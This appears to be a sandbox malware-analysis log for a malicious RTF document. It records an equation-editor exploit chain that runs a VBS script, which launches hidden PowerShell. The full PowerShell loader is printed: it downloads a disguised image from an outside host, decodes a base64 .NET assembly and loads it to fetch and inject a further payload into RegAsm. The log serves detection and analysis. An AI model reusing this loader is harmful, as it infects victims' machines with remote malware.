Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: SecuriteInfo.com.Exploit.ShellCode.69.19968.913.rtf	ReversingLabs: Detection: 60%
Source: SecuriteInfo.com.Exploit.ShellCode.69.19968.913.rtf	Virustotal: Detection: 55%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\luckymokeykissinglover.vbs"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CMR/77662/62.412.012.291//:ptth' , '1' , 'C:\ProgramData\' , 'RMCD','RegAsm',''))} }"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\RMCD.vbs"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\RMCD.vbs"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\RMCD.vbs"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\luckymokeykissinglover.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CMR/77662/62.412.012.291//:ptth' , '1' , 'C:\ProgramData\' , 'RMCD','RegAsm',''))} }"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\RMCD.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
